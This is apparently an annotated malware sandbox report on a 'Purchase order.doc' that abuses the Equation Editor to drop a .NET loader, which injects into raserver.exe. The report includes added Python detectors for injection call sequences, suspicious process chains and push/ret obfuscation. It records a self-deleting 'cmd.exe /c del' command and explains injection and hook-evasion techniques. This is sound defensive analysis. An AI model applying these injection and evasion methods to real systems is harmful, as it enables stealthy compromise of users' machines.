          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_008969FE
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_00905955
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_0090394B
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_00933A83
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_0092CBA4
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_0090DBDA
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_0087FBD7
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_00906BCB
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_008A7B00
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_00922C9C
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_0090AC5E
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_0091FDDD
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_010494B4
Source: C:\Windows\SysWOW64\raserver.exe | Code functions (7_2), 0x0218xxxx-0x0224xxxx range: 02231238, 0218E2E9, 02192305, 02197353, 021DA37B, 021B63DB, 0218F3CF, 021BD005, 021A905A, 02193040, 0218E0C6, 02232622, 02194680, 0219E6C1, 0219C7BC, 0221579A, 021C57C3, 021CD47D, 021A1489, 021C5485, 0219351F, 021AC5F0, 02243A83, 021B7B00, 0223CBA4, 0218FBD7, 0221DBDA, 0219C85C, 021B286D, 0222F8EE, 02215955, 021929B2, 0223098E, 021A69FE, 021C2E2F, 021AEE4C, 021A0F3F, 021BDF7C, 021C0D3B, 0219CD5B, 0222FDDD
Source: C:\Windows\SysWOW64\raserver.exe | Code functions (7_2), 0x0008xxxx-0x0009xxxx range: 0009E066, 0009D596, 0009E840, 0009D950, 0009EC35, 00082D87, 00082D90, 00089E50, 00089E54, 0009DE95, 00082FB0
Source: C:\Windows\SysWOW64\raserver.exe | Code functions (7_2), 0x01F2xxxx range: 01F2A036, 01F28912, 01F21082, 01F25B32, 01F25B30, 01F2B232, 01F2E5CD, 01F22D02
The 0x0218xxxx-0x0224xxxx functions in raserver.exe are the 0x0087xxxx-0x0093xxxx functions of villar8681.exe shifted by a constant 0x1910000 (0092098E to 0223098E, 0087FBD7 to 0218FBD7, 0090DBDA to 0221DBDA): the same code is present in both processes, mapped at a different base in each.
Source: C:\Windows\SysWOW64\raserver.exe | String functions: 0218E2A8 appears 38 times; 021D3F92 appears 108 times; 021D373B appears 238 times; 021FF970 appears 81 times; 0218DF5C appears 112 times
Source: C:\Users\user\AppData\Roaming\villar8681.exe | String functions: 0087DF5C appears 110 times; 008EF970 appears 78 times; 008C373B appears 217 times; 008C3F92 appears 110 times; 0087E2A8 appears 58 times
The five raserver.exe string-function addresses are the five villar8681.exe addresses plus 0x1910000 (0087E2A8 to 0218E2A8, 008C373B to 021D373B, 008EF970 to 021FF970), the same relocation seen in the code-function lists above.
Source: C:\Users\user\AppData\Roaming\villar8681.exe | Code functions (5_2) issuing native calls, 0x0041xxxx range: 0041A350 NtCreateFile; 0041A400 NtReadFile; 0041A480 NtClose; 0041A530 NtAllocateVirtualMemory; 0041A44A NtReadFile; 0041A47A NtClose; 0041A52A NtAllocateVirtualMemory
Source: C:\Users\user\AppData\Roaming\villar8681.exe | Code functions (5_2), 0x0086xxxx-0x0087xxxx range, each followed by LdrInitializeThunk: 008700C4 NtCreateFile; 00870048 NtProtectVirtualMemory; 00870078 NtResumeThread; 0086F9F0 NtClose; 0086F900 NtReadFile; 0086FAD0 NtAllocateVirtualMemory; 0086FAE8 NtQueryInformationProcess; 0086FBB8 NtQueryInformationToken; 0086FB68 NtFreeVirtualMemory; 0086FC90 NtUnmapViewOfSection; 0086FC60 NtMapViewOfSection; 0086FD8C NtDelayExecution; 0086FDC0 NtQuerySystemInformation; 0086FEA0 NtReadVirtualMemory; 0086FED0 NtAdjustPrivilegesToken; 0086FFB4 NtCreateSection
Source: C:\Users\user\AppData\Roaming\villar8681.exe | Code functions (5_2), same range: 008710D0 NtOpenProcessToken; 00870060 NtQuerySection; 008701D4 NtSetValueKey; 0087010C NtOpenDirectoryObject; 00871148 NtOpenThread; 008707AC NtCreateMutant; 0086F8CC NtWaitForSingleObject; 00871930 NtSetContextThread; 0086F938 NtWriteFile; 0086FAB8 NtQueryValueKey; 0086FA20 NtQueryInformationFile; 0086FA50 NtEnumerateValueKey; 0086FBE8 NtQueryVirtualMemory; 0086FB50 NtCreateKey; 0086FC30 NtOpenProcess; 00870C40 NtGetContextThread; 0086FC48 NtSetInformationFile; 00871D80 NtSuspendThread
Source: C:\Windows\SysWOW64\raserver.exe | Code functions (7_2), 0x0217xxxx-0x0218xxxx range, each followed by LdrInitializeThunk: 021800C4 NtCreateFile; 021807AC NtCreateMutant; 0217FAB8 NtQueryValueKey; 0217FAD0 NtAllocateVirtualMemory; 0217FAE8 NtQueryInformationProcess; 0217FB50 NtCreateKey; 0217FB68 NtFreeVirtualMemory; 0217FBB8 NtQueryInformationToken; 0217F900 NtReadFile; 0217F9F0 NtClose; 0217FED0 NtAdjustPrivilegesToken; 0217FFB4 NtCreateSection; 0217FC60 NtMapViewOfSection; 0217FD8C NtDelayExecution; 0217FDC0 NtQuerySystemInformation
Source: C:\Windows\SysWOW64\raserver.exe | Code functions (7_2), same range: 02180048 NtProtectVirtualMemory; 02180078 NtResumeThread; 02180060 NtQuerySection; 021810D0 NtOpenProcessToken; 0218010C NtOpenDirectoryObject; 02181148 NtOpenThread; 021801D4 NtSetValueKey; 0217FA20 NtQueryInformationFile; 0217FA50 NtEnumerateValueKey; 0217FBE8 NtQueryVirtualMemory; 0217F8CC NtWaitForSingleObject; 02181930 NtSetContextThread; 0217F938 NtWriteFile; 0217FE24 NtWriteVirtualMemory; 0217FEA0 NtReadVirtualMemory; 0217FF34 NtQueueApcThread; 0217FFFC NtCreateProcessEx; 0217FC30 NtOpenProcess; 02180C40 NtGetContextThread; 0217FC48 NtSetInformationFile; 0217FC90 NtUnmapViewOfSection; 0217FD5C NtEnumerateKey; 02181D80 NtSuspendThread
Source: C:\Windows\SysWOW64\raserver.exe | Code functions (7_2) issuing native calls, 0x0009xxxx range: 0009A350 NtCreateFile; 0009A400 NtReadFile; 0009A480 NtClose; 0009A530 NtAllocateVirtualMemory; 0009A44A NtReadFile; 0009A47A NtClose; 0009A52A NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 7_2_01F2A036 NtQueryInformationProcess, RtlWow64SuspendThread, NtSetContextThread, NtQueueApcThread, NtResumeThread
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 7_2_01F29BAF NtCreateSection, NtMapViewOfSection, NtMapViewOfSection, NtUnmapViewOfSection, NtClose
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 7_2_01F2A042 NtQueryInformationProcess
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 7_2_01F29BB2 NtCreateSection, NtMapViewOfSection, NtMapViewOfSection
Two things stand out in these lists. First, the 0x0217xxxx-0x0218xxxx stubs are the villar8681.exe 0x0086xxxx-0x0087xxxx stubs at +0x1910000 (0086F9F0 NtClose to 0217F9F0, 008700C4 NtCreateFile to 021800C4), and the 0x0009xxxx stubs are the villar8681.exe 0x0041xxxx stubs at -0x380000 (0041A350 to 0009A350); both processes run the same two images at different bases. Second, the 0x01F2xxxx routines are the injection primitives: 01F29BAF and 01F29BB2 create a section and map it twice, the usual way of filling a section locally and having the same pages appear in a target process without NtWriteVirtualMemory, and 01F2A036 suspends a target thread through the WoW64 helper, rewrites its context, queues a user APC and resumes it.
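The four 0x01F2xxxx routines above are only meaningful as ordered call sequences. The following Python is an added example, not part of the Joe Sandbox report and not code from the sample, that parses lines in the report's own "N_M_ADDRESS api,api,..." form and flags routines whose call order contains a double section mapping, a thread-context hijack or an APC injection. The embedded trace is constructed from the lines above plus one clean stub, and the technique names and the subsequence rules are this example's own assumptions about what each pattern means.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample in the report's "N_M_ADDRESS api,api,..." form
# (N = process index, M = dump index). The first three lines repeat the
# raserver.exe routines listed in the report; the last is a single-call stub.
SAMPLE_TRACE = """\
7_2_01F2A036 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,
7_2_01F29BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,
7_2_01F2A042 NtQueryInformationProcess,
5_2_0086FC90 NtUnmapViewOfSection,LdrInitializeThunk,
"""

LINE_RE = re.compile(r"^(\d+)_(\d+)_([0-9A-Fa-f]{8})\s+(.*?),?\s*$")

# Each technique is an ordered subsequence of calls. Gaps are allowed because
# real loaders interleave bookkeeping calls between the interesting ones.
PATTERNS: Dict[str, List[str]] = {
    # one section mapped twice: once to fill it, once into the target process
    "double section mapping": ["NtCreateSection", "NtMapViewOfSection", "NtMapViewOfSection"],
    # overwrite a suspended thread's registers, then let it run
    "thread context hijack": ["NtSetContextThread", "NtResumeThread"],
    # queue a user APC and wake the thread that will execute it
    "APC injection": ["NtQueueApcThread", "NtResumeThread"],
}


def parse_trace(text: str) -> List[Tuple[str, str, List[str]]]:
    """Return (process_index, address, [api, ...]) for each well-formed line."""
    out = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        proc, _dump, addr, calls = m.groups()
        out.append((proc, addr.upper(), [c for c in calls.split(",") if c]))
    return out


def is_subsequence(pattern: List[str], calls: List[str]) -> bool:
    """True if every element of pattern occurs in calls, in that order."""
    it = iter(calls)
    return all(any(c == want for c in it) for want in pattern)


def scan_trace(text: str) -> Dict[str, List[str]]:
    """Map 'proc:addr' to the technique names it matches; clean routines are omitted."""
    hits: Dict[str, List[str]] = {}
    for proc, addr, calls in parse_trace(text):
        matched = [name for name, pat in PATTERNS.items() if is_subsequence(pat, calls)]
        if matched:
            hits[f"{proc}:{addr}"] = matched
    return hits


if __name__ == "__main__":
    for key, techniques in scan_trace(SAMPLE_TRACE).items():
        print(key, "->", ", ".join(techniques))
```

Subsequence matching rather than exact matching is deliberate: 01F2A036 has NtQueryInformationProcess and RtlWow64SuspendThread in front of the hijack calls, and a stricter rule would miss it. The same function can be pointed at any sandbox's per-function API listing once the line regex is adjusted.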
Source: ~WRF{79E0ADDF-4BCA-42D2-95DC-650BFEE60233}.tmp.0.dr | OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~WRF{79E0ADDF-4BCA-42D2-95DC-650BFEE60233}.tmp.0.dr | OLE indicator has summary info: false
Source: C:\Users\user\AppData\Roaming\villar8681.exe | Memory allocated: 76F90000 page execute and read and write (2 entries)
Source: C:\Users\user\AppData\Roaming\villar8681.exe | Memory allocated: 76E90000 page execute and read and write (2 entries)
Source: C:\Windows\SysWOW64\raserver.exe | Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\raserver.exe | Memory allocated: 76E90000 page execute and read and write
Source: villar8681.exe.2.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: villarzx[1].exe.2.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: Purchase order.doc | Virustotal: Detection: 40%
Source: Purchase order.doc | ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Roaming\villar8681.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers (Software Restriction Policy rules; Windows reads this key itself when a process is created, so the read matches the self re-launch listed below and is a weak indicator on its own)
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\villar8681.exe C:\Users\user\AppData\Roaming\villar8681.exe (listed twice in the report)
Source: C:\Users\user\AppData\Roaming\villar8681.exe | Process created: C:\Users\user\AppData\Roaming\villar8681.exe C:\Users\user\AppData\Roaming\villar8681.exe (listed twice in the report)
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\raserver.exe C:\Windows\SysWOW64\raserver.exe
Source: C:\Windows\SysWOW64\raserver.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Roaming\villar8681.exe' (listed twice in the report)
Read as a chain: EQNEDT32.EXE is started with -Embedding, i.e. COM-activated to serve an embedded Equation object, which is why its parent is recorded as unknown rather than WINWORD.EXE; the Equation Editor writes and starts villar8681.exe from the roaming profile; villar8681.exe re-launches its own image; explorer.exe then starts raserver.exe, and raserver.exe finally removes the dropped loader with cmd.exe /c del.
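Process-creation lines like the ones above are what an endpoint sensor records, so the chain is worth turning into parent/child rules. The following Python is an added example, not part of the report, that evaluates a handful of such rules over process events reconstructed from the chain above. The ProcEvent record, the sample event list and the rule names are this example's own assumptions; the paths are the report's.

```python
from dataclasses import dataclass
from typing import Callable, List, Tuple


@dataclass(frozen=True)
class ProcEvent:
    """Minimal process-creation record (the fields a Sysmon event 1 carries)."""
    parent_image: str   # empty when the sensor did not capture the creator
    image: str
    command_line: str


# Constructed from the chain in the report; the paths are the report's own.
OFFICE = r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE"
EQNEDT = r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
DROPPED = r"C:\Users\user\AppData\Roaming\villar8681.exe"
EXPLORER = r"C:\Windows\explorer.exe"
RASERVER = r"C:\Windows\SysWOW64\raserver.exe"
CMD = r"C:\Windows\SysWOW64\cmd.exe"

SAMPLE_EVENTS: List[ProcEvent] = [
    ProcEvent("", OFFICE, f"'{OFFICE}' /Automation -Embedding"),
    ProcEvent("", EQNEDT, f"'{EQNEDT}' -Embedding"),
    ProcEvent(EQNEDT, DROPPED, DROPPED),
    ProcEvent(DROPPED, DROPPED, DROPPED),
    ProcEvent(EXPLORER, RASERVER, RASERVER),
    ProcEvent(RASERVER, CMD, f"/c del '{DROPPED}'"),
]


def _base(path: str) -> str:
    """Lower-cased file name of a Windows path ('' for an empty path)."""
    return path.rsplit("\\", 1)[-1].lower()


def _in_profile(text: str) -> bool:
    """True if the text mentions a path under a user's AppData tree."""
    return "\\appdata\\" in text.lower()


# (rule name, predicate); each predicate looks at one event in isolation.
RULES: List[Tuple[str, Callable[[ProcEvent], bool]]] = [
    ("equation editor spawned a child",
     lambda e: _base(e.parent_image) == "eqnedt32.exe"),
    ("executable started from the user profile",
     lambda e: _in_profile(e.image)),
    ("process re-launched its own image",
     lambda e: e.parent_image != "" and e.parent_image.lower() == e.image.lower()),
    # explorer.exe is 64-bit on x64 Windows; a 32-bit child from SysWOW64 is unusual
    ("explorer.exe started a SysWOW64 binary",
     lambda e: _base(e.parent_image) == "explorer.exe" and "\\syswow64\\" in e.image.lower()),
    ("cmd.exe deleting a file from the user profile",
     lambda e: _base(e.image) == "cmd.exe"
     and " del " in f" {e.command_line.lower()} "
     and _in_profile(e.command_line)),
]


def evaluate(events: List[ProcEvent]) -> List[Tuple[int, str]]:
    """Return (event index, rule name) for every rule an event trips."""
    hits: List[Tuple[int, str]] = []
    for idx, ev in enumerate(events):
        for name, pred in RULES:
            if pred(ev):
                hits.append((idx, name))
    return hits


if __name__ == "__main__":
    for idx, name in evaluate(SAMPLE_EVENTS):
        ev = SAMPLE_EVENTS[idx]
        print(f"event {idx}: {_base(ev.parent_image) or '?'} -> {_base(ev.image)}: {name}")
```

Each rule fires on a single event, so the two Office processes with no recorded parent trip nothing, while the Equation Editor child, the self re-launch, the explorer.exe to raserver.exe step and the self-deleting cmd.exe are each caught by the line that describes them. In production the first rule is the one with the least noise, since the Equation Editor has no legitimate reason to start children.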
Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\Desktop\~$rchase order.doc (Word's owner lock file for the open document)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRE2A0.tmp
Source: classification engine | Classification label: mal100.troj.expl.evad.winDOC@9/10@4/3
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File read: C:\Users\desktop.ini
Source: villar8681.exe, 00000004.00000000.413584618.0000000001042000.00000020.00020000.sdmp, villar8681.exe, 00000005.00000000.423645036.0000000001042000.00000020.00020000.sdmp, villarzx[1].exe.2.dr | Binary or memory string: insert into mediaitem (name, type, checked_to_patron_id, checkout_date, due_date) values (@name, @type, @patron_id, @co_date, @due_date);
Source: villar8681.exe, 00000004.00000000.413584618.0000000001042000.00000020.00020000.sdmp, villar8681.exe, 00000005.00000000.423645036.0000000001042000.00000020.00020000.sdmp, villarzx[1].exe.2.dr | Binary or memory string: select id, name, type, checked_to_patron_id, checkout_date, due_date from mediaitem {0} order by name;where checked_to_patron_id = Mwhere checked_to_patron_id is not nullaselect id, name, type from patron where id = {0}_select id, name, type from patron order by nameWThe method or operation is not implemented.9Library.Properties.Resources
These SQL strings and the Library.Properties.Resources name belong to an ordinary library-checkout application whose code the .NET dropper carries (the unpacker finding below sits in Library/Form1.cs of the same binary); they are cover, not payload functionality.
Source: C:\Users\user\AppData\Roaming\villar8681.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: Purchase order.doc | Joe Sandbox Cloud Basic: Detection: clean Score: 0 (a separate, earlier analysis; it disagrees with this report's verdict)
Source: explorer.exe, 00000006.00000000.430288611.0000000002AE0000.00000002.00020000.sdmp | Binary or memory string: .VBPud<_
Source: villar8681.exe | String found in binary or memory: es>false</DisallowStartIfOnBatteries> <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries> <AllowHardTerminate>false</AllowHardTerminate> <StartWhenAvailable>true</StartWhenAvailable> <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvail (2 identical entries)
Source: villar8681.exe | String found in binary or memory: ble> <IdleSettings> <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings> <AllowStartOnDemand>true</AllowStartOnDemand> <Enabled>true</Enabled> <Hidden>false</Hidden> <RunOnlyIfIdle (2 identical entries)
The two fragments are consecutive pieces of the <Settings> element of a Task Scheduler task definition (the first ends in "RunOnlyIfNetworkAvail", the second begins with "ble>"), so the loader carries a task XML template; nothing on this page records a task actually being registered.
Source: ~WRF{79E0ADDF-4BCA-42D2-95DC-650BFEE60233}.tmp.0.dr | OLE document summary: title field not present or empty
Source: ~WRF{79E0ADDF-4BCA-42D2-95DC-650BFEE60233}.tmp.0.dr | OLE document summary: author field not present or empty
Source: ~WRF{79E0ADDF-4BCA-42D2-95DC-650BFEE60233}.tmp.0.dr | OLE document summary: edited time not present or 0
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts (2 entries; a hosts read is name resolution, consistent with the Equation Editor itself fetching the dropped executable)
Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Roaming\villar8681.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: RAServer.pdb^ | source: villar8681.exe, 00000005.00000002.462916588.0000000000570000.00000040.00020000.sdmp
Source: Binary string: wntdll.pdb | source: villar8681.exe, raserver.exe
Source: Binary string: RAServer.pdb | source: villar8681.exe, 00000005.00000002.462916588.0000000000570000.00000040.00020000.sdmp
wntdll.pdb is the debug-path name of the 32-bit ntdll.dll. Seeing it in both processes, together with the identical Nt* stub layout at two bases listed above (0086F9F0 NtClose in villar8681.exe, 0217F9F0 NtClose in raserver.exe), is consistent with each process holding its own mapped copy of ntdll and calling that instead of the loaded system image, a common way of stepping around user-mode API hooks. RAServer.pdb is the debug-path name of raserver.exe itself; finding it inside villar8681.exe's memory (process 5, region 0x570000, protection field 0x40, i.e. PAGE_EXECUTE_READWRITE) means the loader had the raserver.exe image in its own address space, which matches raserver.exe being the process that later runs the payload.
Source: ~WRF{79E0ADDF-4BCA-42D2-95DC-650BFEE60233}.tmp.0.dr | Initial sample: OLE indicators vbamacros = False (no VBA macros; the execution path is the embedded Equation object served by EQNEDT32.EXE, see the process creations above)

Data Obfuscation:

.NET source code contains potential unpacker
Source: villar8681.exe.2.dr, Library/Form1.cs | .Net Code: TypeNameBuilder System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: villarzx[1].exe.2.dr, Library/Form1.cs | .Net Code: TypeNameBuilder System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: unpacked dumps 4.2.villar8681.exe.1040000.2.unpack, 4.0.villar8681.exe.1040000.0.unpack, 5.0.villar8681.exe.1040000.2.unpack, 5.0.villar8681.exe.1040000.10.unpack, 5.0.villar8681.exe.1040000.4.unpack, 5.0.villar8681.exe.1040000.1.unpack, 5.0.villar8681.exe.1040000.6.unpack, 5.0.villar8681.exe.1040000.3.unpack, 5.2.villar8681.exe.1040000.5.unpack, 5.0.villar8681.exe.1040000.0.unpack, 5.0.villar8681.exe.1040000.8.unpack, Library/Form1.cs | .Net Code: the same System.Reflection.Assembly::Load(System.Byte[]) call
Assembly.Load(byte[]) loads a managed assembly straight from a memory buffer, which is how a .NET loader runs a decrypted next stage without writing it to disk as a separate file; the dropped villar8681.exe is that loader, and the Library/Form1.cs location matches the library-application strings found in the same binary above.
Source: C:\Users\user\AppData\Roaming\villar8681.exe | Code function: 4_2_00732B1B push es; retn 0000h
Source: C:\Users\user\AppData\Roaming\villar8681.exe | Code function: 4_2_002DBFE3 push cs; iretd
Source: C:\Users\user\AppData\Roaming\villar8681.exe | Code function: 5_2_004063D8 pushad; iretd
Source: C:\Users\user\AppData\Roaming\villar8681.exe | Code function: 5_2_0041D4F2 push eax; ret
Source: C:\Users\user\AppData\Roaming\villar8681.exe | Code function: 5_2_0041D4FB push eax; ret
Source: C:\Users\user\AppData\Roaming\villar8681.exe | Code function: 5_2_0041D4A5 push eax; ret
Source: C:\Users\user\AppData\Roaming\villar8681.exe | Code function: 5_2_0041D55C push eax; ret
Source: C:\Users\user\AppData\Roaming\villar8681.exe | Code function: 5_2_00406DC3 pushfd; retf
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 7_2_0218DFA1 push ecx; ret
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 7_2_000863D8 pushad; iretd
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 7_2_0009D4A5 push eax; ret
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 7_2_0009D4FB push eax; ret
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 7_2_0009D4F2 push eax; ret
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 7_2_0009D55C push eax; ret
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 7_2_0009DCA5 push es; iretd
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 7_2_00086DC3 pushfd; retf
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 7_2_01F2E9B5 push esp; retn 0000h
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 7_2_01F2EB1E push esp; retn 0000h
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 7_2_01F2EB02 push esp; retn 0000h
A push followed by a return transfers control to whatever was pushed without a call or jmp, which hides the real target from linear disassembly. The 5_2 villar8681.exe addresses and the 0x0008xxxx/0x0009xxxx raserver.exe addresses differ by a constant 0x380000 (004063D8 and 000863D8, 0041D4F2 and 0009D4F2, 00406DC3 and 00086DC3): the same payload image, relocated into raserver.exe.
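The pairs listed above are easy to find once you know the encodings. The following Python is an added example, not part of the report and not code from the sample, that locates push/ret style transfers in raw x86 bytes; the byte string is constructed for the example, and the push and return tables cover the forms that appear in this report plus push imm32, which is the classic way of turning a return into a jump. It scans bytes linearly, so on a real section it should be fed instruction boundaries from a disassembler; data can otherwise look like 50 C3.

```python
from typing import List, Tuple

# Single-byte push forms (register, segment register, pushad, pushfd).
PUSH_OPS = {
    0x50: "push eax", 0x51: "push ecx", 0x52: "push edx", 0x53: "push ebx",
    0x54: "push esp", 0x55: "push ebp", 0x56: "push esi", 0x57: "push edi",
    0x06: "push es", 0x0E: "push cs", 0x16: "push ss", 0x1E: "push ds",
    0x60: "pushad", 0x9C: "pushfd",
}
# Return forms: mnemonic and the size of the immediate that follows the opcode.
RET_OPS = {
    0xC3: ("ret", 0), 0xC2: ("retn", 2), 0xCB: ("retf", 0), 0xCA: ("retf", 2), 0xCF: ("iretd", 0),
}

# Constructed sample: an ordinary prologue, five push/ret transfers, an ordinary epilogue.
SAMPLE_CODE = bytes.fromhex(
    "55 8B EC"              # push ebp; mov ebp, esp      (prologue, no hit)
    "68 78 56 34 12 C3"     # push 0x12345678; ret        (jump through the return address)
    "50 C3"                 # push eax; ret               (the form at 5_2_0041D4F2)
    "54 C2 00 00"           # push esp; retn 0000h        (the form at 7_2_01F2E9B5)
    "60 CF"                 # pushad; iretd               (the form at 5_2_004063D8)
    "9C CB"                 # pushfd; retf                (the form at 5_2_00406DC3)
    "33 C0 C3"              # xor eax, eax; ret           (epilogue, no hit)
)


def find_push_ret(code: bytes) -> List[Tuple[int, str]]:
    """Return (offset, 'push ...; ret...') for each push immediately followed by a return."""
    hits: List[Tuple[int, str]] = []
    i, n = 0, len(code)
    while i < n:
        op = code[i]
        if op in PUSH_OPS:
            push_len, push_txt = 1, PUSH_OPS[op]
        elif op == 0x68 and i + 5 <= n:  # push imm32: opcode plus a 4-byte operand
            imm = int.from_bytes(code[i + 1:i + 5], "little")
            push_len, push_txt = 5, f"push 0x{imm:08X}"
        else:
            i += 1
            continue
        j = i + push_len
        if j < n and code[j] in RET_OPS:
            name, imm_len = RET_OPS[code[j]]
            if j + 1 + imm_len <= n:
                if imm_len:
                    operand = int.from_bytes(code[j + 1:j + 1 + imm_len], "little")
                    name += f" {operand:04X}h"
                hits.append((i, f"{push_txt}; {name}"))
                i = j + 1 + imm_len
                continue
        i += 1
    return hits


if __name__ == "__main__":
    for offset, text in find_push_ret(SAMPLE_CODE):
        print(f"{offset:04X}: {text}")
```

The prologue's push ebp is not reported because the next byte is not a return, which is the whole heuristic: a push is only suspicious when the very next instruction consumes it as a return address.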
Source: initial sample | Static PE information: section name: .text entropy: 7.5498663896 (2 identical entries; entropy this close to 8 means the section holds packed or encrypted data rather than plain code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\villarzx[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Roaming\villar8681.exe
The Content.IE5 path is the WinINet cache, so the executable was downloaded from inside EQNEDT32.EXE through a WinINet-based API and then written a second time to the roaming profile under the name that is executed.

Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe | User mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8F 0xFE 0xE5
The modified prolog is in explorer.exe, the process that goes on to start raserver.exe (see the process creations above), so the hook is evidence of injected code resident in explorer.exe; comparing the first bytes of the exported function in memory with the on-disk USER32.dll is how this is verified on a live host.
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
